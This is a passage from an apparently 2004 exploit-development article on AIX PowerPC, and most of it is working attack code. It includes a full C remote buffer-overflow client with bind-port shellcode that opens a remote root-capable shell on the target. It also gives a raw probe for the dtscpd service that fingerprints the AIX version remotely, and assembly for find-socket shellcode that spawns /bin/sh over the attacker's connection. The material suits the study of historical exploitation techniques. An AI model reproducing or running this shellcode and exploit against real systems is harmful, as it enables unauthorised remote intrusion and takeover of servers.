It is easy to write the attack programme after gaining the overflow buffer size and the return address.

/* client.c -  remote overflow demo
*
*  2004.06.16
*  san@nsfocus.com
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

// It needs adjust.
#define RET 0x2ff22d88;

unsigned char sh_Buff[] =
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20            */
    "\x40\x82\xff\xfd"     /* bnel    <syscallcode>          */
    "\x7e\xa8\x02\xa6"     /* mflr    r21                    */
    "\x3a\xc0\x01\xff"     /* lil     r22,0x1ff              */
    "\x3a\xf6\xfe\x2d"     /* cal     r23,-467(r22)          */
    "\x7e\xb5\xba\x14"     /* cax     r21,r21,r23            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */

    "\x05\x82\x53\xa0"     /* syscall numbers                */
    "\x87\xa0\x01\x42"     /* execve=0x05 close=0xa0         */
    "\x8d\x8c\x8b\x8a"     /* socket=0x8d bind=0x8c          */
                           /* listen=0x8b naccept=0x8a       */
                           /* kfcntl=0x142                   */

    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca    0x0                    */
    "\x3a\xb5\xff\xf8"     /* cal     r21,-8(r21)            */

    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234         */
    "\x41\x82\xff\xfd"     /* beql    <bindsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24                    */
    "\x92\x98\xff\xfc"     /* st      r20,-4(r24)            */
    "\x38\x76\xfe\x03"     /* cal     r3,-509(r22)           */
    "\x38\x96\xfe\x02"     /* cal     r4,-510(r22)           */
    "\x98\x78\xff\xf9"     /* stb     r3,-7(r24)             */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20                 */
    "\x88\x55\xff\xfc"     /* lbz     r2,-4(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3                 */
    "\x38\x98\xff\xf8"     /* cal     r4,-8(r24)             */
    "\x38\xb6\xfe\x11"     /* cal     r5,-495(r22)           */
    "\x88\x55\xff\xfd"     /* lbz     r2,-3(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x38\x96\xfe\x06"     /* cal     r4,-506(r22)           */
    "\x88\x55\xff\xfe"     /* lbz     r2,-2(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20                 */
    "\x88\x55\xff\xff"     /* lbz     r2,-1(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3                 */
    "\x3b\x56\xfe\x03"     /* cal     r26,-509(r22)          */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26                 */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7f\x45\xd3\x78"     /* mr      r5,r26                 */
    "\xa0\x55\xff\xfa"     /* lhz     r2,-6(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x40\x80\xff\xd4"     /* bge     <bindsckcode+120>      */

    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)           */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)           */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)           */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)           */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)            */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)           */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "/bin/sh"
;

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -3;
    }
    if(i==0)
    {
        close(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        return -5;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

/* ripped from TESO code */
void shell (int sock)
{
    int     l;
    char    buf[512];
    fd_set  rfds;

    while (1) {
        FD_SET (0, &rfds);
        FD_SET (sock, &rfds);

        select (sock + 1, &rfds, NULL, NULL, NULL);

        if (FD_ISSET (0, &rfds)) {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                perror ("read user");
                exit (EXIT_FAILURE);
            }
            write (sock, buf, l);
        }

        if (FD_ISSET (sock, &rfds)) {
            l = read (sock, buf, sizeof (buf));
            if (l <= 0) {
                perror ("read remote");
                exit (EXIT_FAILURE);
            }
            write (1, buf, l);
        }
    }
}

void PrintSc(unsigned char *lpBuff, int buffsize)
{
    int i,j;
    char *p;
    char msg[4];
    fprintf(stderr, "/* %d bytes */\n",buffsize);
    for(i=0;i<buffsize;i++)
    {
        if((i%4)==0)
            if(i!=0)
                fprintf(stderr, "\"\n\"");
            else
                fprintf(stderr, "\"");
        sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                fprintf(stderr, "%c", _tolower(*p));
            else
                fprintf(stderr, "%c", p[0]);
        }
    }
    fprintf(stderr, "\";\n");
}

int main(int argc, char *argv[]) {
    unsigned char Buff[1024];

    unsigned long *ps;
    int s, i, k;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }

    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    ps = (unsigned long *)Buff;
    for(i=0; i<sizeof(Buff)/4; i++)
    {
        *(ps++) = 0x60000000;
    }
    
    i = sizeof(sh_Buff) % 4;
    
    memcpy(&Buff[sizeof(Buff) - sizeof(sh_Buff) - i], sh_Buff, sizeof(sh_Buff));

    ps = (unsigned long *)Buff;
    for(i=0; i<92/4; i++)
    {
        *(ps++) = RET;
    }
    Buff[sizeof(Buff) - 1] = 0;
    
    //PrintSc(Buff, sizeof(Buff));

    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }

    sleep (1);
    
    k = Make_Connection(argv[1], 4660, 10);
    if (!k) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    shell(k);

}

Attack program is easy, but there are different syscall numbers in various AIX editions. In local exploit, you can use oslevel -r to determin AIX version, and then write in the corresponding syscall number. It is invalid in remote exploit. If the remote server provides dtscpd service(6112), we can send the following data to dtscpd service:

char peer0_0[] = {
0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32,
0x30, 0x34, 0x30, 0x30, 0x30, 0x64, 0x30, 0x30,
0x30, 0x31, 0x20, 0x20, 0x34, 0x20, 0x00, 0x72,
0x6f, 0x6f, 0x74, 0x00, 0x00, 0x31, 0x30, 0x00,
0x00 };

The dtscpd service will return the following information about system in my box:

aix5:AIX:1:001381144C00

So we can obtain AIX version remotely, and then we write corresponding syscall number in shellcode by remote exploit.

--[ 8 - Find socket shellcode

Binding port shellcode can't be possibly connected and neither can connect back in the secure network environment protected by firewall. However, you can use the socket for attacking connect.

The LSD provides a way that uses getpeername to find socket, but there exists a problem that the port sent by attacker in the NAT network environment won't matches with the one searched by server. In addition, bkbll ever refered to another easy way that is OOB. Out of band data won't be blocked in Berkeley socket implement.

The following codes show how this shellcode to implement on AIX5.1:


void ShellCode()
{
    asm                              \
    ("                               \
Start:                              ;\
        xor.    %r20, %r20, %r20    ;\
        bnel    Start               ;\
        mflr    %r21                ;\
        addi    %r21, %r21, 12      ;\
        b       Loop                ;\
        crorc   %cr6, %cr6, %cr6    ;\
        svca    0                   ;\
                                     \
Loop:                               ;\
        li      %r2, 0x81           ;\
        mr      %r3, %r20           ;\
        addi    %r4, %r21, -40      ;\
        li      %r5, 1              ;\
        li      %r6, 1              ;\
        mtctr   %r21                ;\
        bctrl                       ;\
                                     \
        lbz     %r4, -40(%r21)      ;\
        cmpi    %cr0, %r4, 0x49     ;\
        beq     Found               ;\
        addi    %r20, %r20, 1       ;\
        b       Loop                ;\
                                     \
Found:                              ;\
        li      %r22, 2             ;\
                                     \
DupHandle:                          ;\
        li      %r2, 0xa0           ;\
        mr      %r3, %r22           ;\
        mtctr   %r21                ;\
        bctrl                       ;\
                                     \
        li      %r2, 0x142          ;\
        mr      %r3, %r20           ;\
        li      %r4, 0              ;\
        mr      %r5, %r22           ;\
        mtctr   %r21                ;\
        bctrl                       ;\
                                     \
        addic.  %r22, %r22, -1      ;\
        bge     DupHandle           ;\
                                     \
        addi    %r3, %r21, 140      ;\
        stw     %r3, -8(%r1)        ;\
        li      %r5, 0              ;\
        stw     %r5, -4(%r1)        ;\
        subi    %r4, %r1, 8         ;\
        li      %r2, 5              ;\
        crorc   %cr6, %cr6, %cr6    ;\
        svca    0                   ;\
        .byte   '/', 'b', 'i', 'n',  \
                '/', 's', 'h', 0x0  ;\
    ");
}

The AIXes of other editions need changed the corresponding syscall number.

I have a presentation about find socket shellcode in Xcon 2004, and it is in various ways on various OS.

--[ 9 - Reference

[1]  UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes
     http://lsd-pl.net/unix_assembly.html
[2]  PowerPC / OS X (Darwin) Shellcode Assembly - B-r00t
[3]  Assembler Language Reference
     http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/alangreftfrm.htm
[4]  PowerPC Microprocessor Family: The Programming Environments for 32-Bit Microprocessors
     http://www-3.ibm.com/chips/techlib/techlib.nsf/techdocs/852569B20050FF778525699600719DF2/$file/6xx_pem.pdf
[5]  OPTIMIZING PowerPC CODE - Gary Kacmarcik
[6]  PowerPC assembly
     http://www-900.ibm.com/developerWorks/cn/linux/hardware/ppc/assembly/index_eng.shtml
[7]  A developer's guide to the PowerPC architecture
     http://www-900.ibm.com/developerWorks/cn/linux/l-powarch/index_eng.shtml
[8]  [Tips]AIX (PPC)??exploite 1?
     https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28177
[9]  http://aixpdslib.seas.ucla.edu/
[10] 64-bit PowerPC ELF Application Binary Interface Supplement 1.7
     http://www.linuxbase.org/spec/ELF/ppc64/spec/book1.html
[11] Mach-O Runtime Conventions for PowerPC
     http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/2rt_powerpc_abi/chapter_9_section_1.html
[12] Programmer's Introduction to PowerPC
     http://physinfo-mac0.ulb.ac.be/divers_html/PowerPC_Programming_Info/intro_to_ppc/ppc0_index.html
[13] http://www.honeynet.org/scans/scan28/